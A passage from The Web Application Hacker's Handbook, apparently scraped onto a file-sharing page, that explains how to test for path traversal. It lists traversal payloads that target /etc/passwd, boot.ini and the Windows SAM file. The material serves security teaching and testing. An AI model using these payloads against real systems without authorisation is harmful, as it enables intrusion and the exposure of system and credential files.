The Web Application Hacker’s Handbook Discovering and Exploiting Security Flaws

If the application function you are attacking provides read access to a

Download 5,76 Mb.

Pdf ko'rish

bet	588/875
Sana	01.01.2022
Hajmi	5,76 Mb.
	#293004

1 ... 584 585 586 587 588 589 590 591 ... 875

Bog'liq
3794 1008 4334

If you are lucky, your browser will display the contents of the file you have requested, as in Figure 10-1.
One test that is often effective is to attempt to write two files, one that ought to be writable by any user, and one which should not be writable

If the application function you are attacking provides read access to a

file, attempt to access a known world-readable file on the operating sys-

tem in question. Submit one of the following values as the filename

parameter you control:

../../../../../../../../../../../../etc/passwd

../../../../../../../../../../../../boot.ini

If you are lucky, your browser will display the contents of the file you have

requested, as in Figure 10-1.

■

If the function you are attacking provides write access to a file, it may be

more difficult to verify conclusively whether the application is vulnerable.

One test that is often effective is to attempt to write two files, one that

ought to be writable by any user, and one which should not be writable

even by root or Administrator. For example, on Windows platforms you

can try:

../../../../../../../../../../../../writetest.txt

../../../../../../../../../../../../windows/system32/config/sam

Download 5,76 Mb.

Do'stlaringiz bilan baham:

1 ... 584 585 586 587 588 589 590 591 ... 875